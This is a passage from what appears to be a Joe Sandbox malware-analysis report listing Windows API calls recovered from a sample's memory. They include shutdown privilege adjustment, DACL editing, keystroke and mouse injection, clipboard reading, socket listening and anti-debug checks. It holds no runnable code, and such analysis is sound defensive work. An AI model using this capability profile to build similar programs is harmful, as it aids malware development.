                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                                                    • API String ID: 2192556992-3457252023
                                                                                                                                                    • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                                                                    • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                                                                                                    • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                                                                    • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                                                                                                    APIs
                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                                                                                                    • __swprintf.LIBCMT ref: 004722B9
                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FolderPath$LocalTime__swprintf
                                                                                                                                                    • String ID: %.3d
                                                                                                                                                    • API String ID: 3337348382-986655627
                                                                                                                                                    • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                                                                    • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                                                                                                    • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                                                                    • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 004428A8
• FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
• FindClose.KERNEL32(00000000), ref: 0044291C
• FindClose.KERNEL32(00000000), ref: 00442930
• FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
• SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
• SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
• FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
• FindClose.KERNEL32(00000000), ref: 004429D4
  • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
• FindClose.KERNEL32(00000000), ref: 004429E2
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 2640511053-438819550
APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
• OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
• GetLastError.KERNEL32 ref: 00433414
• ExitWindowsEx.USER32(?,00000000), ref: 00433437
• InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
• SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
Strings
Similarity
• API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 2938487562-3733053543
APIs
  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
  • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
  • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
• GetLengthSid.ADVAPI32(?), ref: 004461D0
• GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
• GetLengthSid.ADVAPI32(?), ref: 00446241
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
• CopySid.ADVAPI32(00000000), ref: 00446271
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
Similarity
• API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
• API String ID: 1255039815-0
APIs
• __swprintf.LIBCMT ref: 00433073
• __swprintf.LIBCMT ref: 00433085
• __wcsicoll.LIBCMT ref: 00433092
• FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
• LoadResource.KERNEL32(?,00000000), ref: 004330BD
• LockResource.KERNEL32(00000000), ref: 004330CA
• FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
• LoadResource.KERNEL32(?,00000000), ref: 00433105
• SizeofResource.KERNEL32(?,00000000), ref: 00433114
• LockResource.KERNEL32(?), ref: 00433120
Similarity
• API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
• String ID:
• API String ID: 1158019794-0
APIs
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D627
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
• GetLastError.KERNEL32 ref: 0045D6BF
• SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
Strings
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                    • API String ID: 4194297153-14809454
                                                                                                                                                    • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                                                    • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                                                                                                    • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                                                    • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove$_strncmp
                                                                                                                                                    • String ID: @oH$\$^$h
                                                                                                                                                    • API String ID: 2175499884-3701065813
                                                                                                                                                    • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                                                                    • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                                                                                                    • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                                                                    • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                                                                                                    APIs
                                                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                                                                                                    • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 540024437-0
                                                                                                                                                    • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                                                    • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                                                                                                    • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                                                    • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                                                                                    • API String ID: 0-2872873767
                                                                                                                                                    • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                                                    • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                                                                                                    • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                                                    • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                                                                                                    APIs
                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 00475644
                                                                                                                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                    • _wcscat.LIBCMT ref: 00475657
                                                                                                                                                    • __wcsicoll.LIBCMT ref: 0047567B
                                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2547909840-0
                                                                                                                                                    • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                                                    • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                                                                                                    • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                                                    • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                                                                                                    • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                                                                                                    • FindClose.KERNEL32(?), ref: 004525FF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                                                                                                    • String ID: *.*$\VH
                                                                                                                                                    • API String ID: 2786137511-2657498754
                                                                                                                                                    • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
• Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
• Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
• Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
APIs
• IsDebuggerPresent.KERNEL32 ref: 00421FC1
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
• UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
• GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
• TerminateProcess.KERNEL32(00000000), ref: 00422004
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID: pqI
• API String ID: 2579439406-2459173057
• Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
• Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
• Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
• Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
APIs
• __wcsicoll.LIBCMT ref: 00433349
• mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
• __wcsicoll.LIBCMT ref: 00433375
• mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
Strings
Similarity
• API ID: __wcsicollmouse_event
• String ID: DOWN
• API String ID: 1033544147-711622031
• Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
• Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
• Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
• Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
APIs
• GetKeyboardState.USER32(?), ref: 0044C3D2
• SetKeyboardState.USER32(00000080), ref: 0044C3F6
• PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
• PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
• SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
Similarity
• API ID: KeyboardMessagePostState$InputSend
• String ID:
• API String ID: 3031425849-0
• Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
• Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
• Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
• Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
APIs
  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
• socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
• WSAGetLastError.WSOCK32(00000000), ref: 00476692
Similarity
• API ID: ErrorLastinet_addrsocket
• String ID:
• API String ID: 4170576061-0
• Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
• Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
• Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
• Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
APIs
  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
• IsWindowVisible.USER32 ref: 0047A368
• IsWindowEnabled.USER32 ref: 0047A378
• GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
• IsIconic.USER32 ref: 0047A393
• IsZoomed.USER32 ref: 0047A3A1
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
• Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
• Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
• Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
APIs
  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
• CoInitialize.OLE32(00000000), ref: 00478442
• CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
• CoUninitialize.OLE32 ref: 0047863C
Strings
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
                                                                                                                                                    • Opcode ID: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
                                                                                                                                                    • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                                                                                                    • Opcode Fuzzy Hash: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
                                                                                                                                                    • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
APIs
• OpenClipboard.USER32(?), ref: 0046DCE7
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
• GetClipboardData.USER32(0000000D), ref: 0046DD01
• CloseClipboard.USER32 ref: 0046DD0D
• GlobalLock.KERNEL32(00000000), ref: 0046DD37
• CloseClipboard.USER32 ref: 0046DD41
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
• GetClipboardData.USER32(00000001), ref: 0046DD8D
• CloseClipboard.USER32 ref: 0046DD99
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
• String ID:
• API String ID: 15083398-0
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: _memmove
• String ID: U$\
• API String ID: 4104443479-100911408
APIs
• FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
